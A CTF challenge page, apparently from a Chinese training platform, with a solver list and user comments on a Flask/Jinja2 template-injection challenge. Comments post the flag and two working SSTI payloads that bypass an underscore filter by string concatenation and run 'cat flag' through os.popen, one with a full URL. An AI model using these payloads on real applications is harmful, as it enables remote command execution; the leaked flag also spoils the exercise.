评分(0)
暂无评分
解题动态
lizhibin 攻破了该题 5天前
3xsh0re 攻破了该题 11天前
r1ng_13 攻破了该题 13天前
dyh1213 攻破了该题 19天前
linggin 攻破了该题 1月前
mhjmhu 攻破了该题 1月前
yttitan 攻破了该题 1月前
2790819062 攻破了该题 1月前
litt 攻破了该题 2月前
xjn12 攻破了该题 2月前
Zpfhh 攻破了该题 2月前
18273414848 攻破了该题 3月前
smtall 攻破了该题 3月前
caocao 攻破了该题 3月前
MuMu123 攻破了该题 3月前
eason2023 攻破了该题 3月前
小城阿扬 攻破了该题 3月前
Paradiso 攻破了该题 3月前
wszdhf 攻破了该题 3月前
评论
r1ng_13 13天前
举报
找到注入点,分镜直接秒
nakanodarling 10月前
举报
fenjing
yaozhiwang 1年前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 1年前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 1年前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 1年前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 2年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 2年前
举报
爆出传参search,利用字符串拼接绕过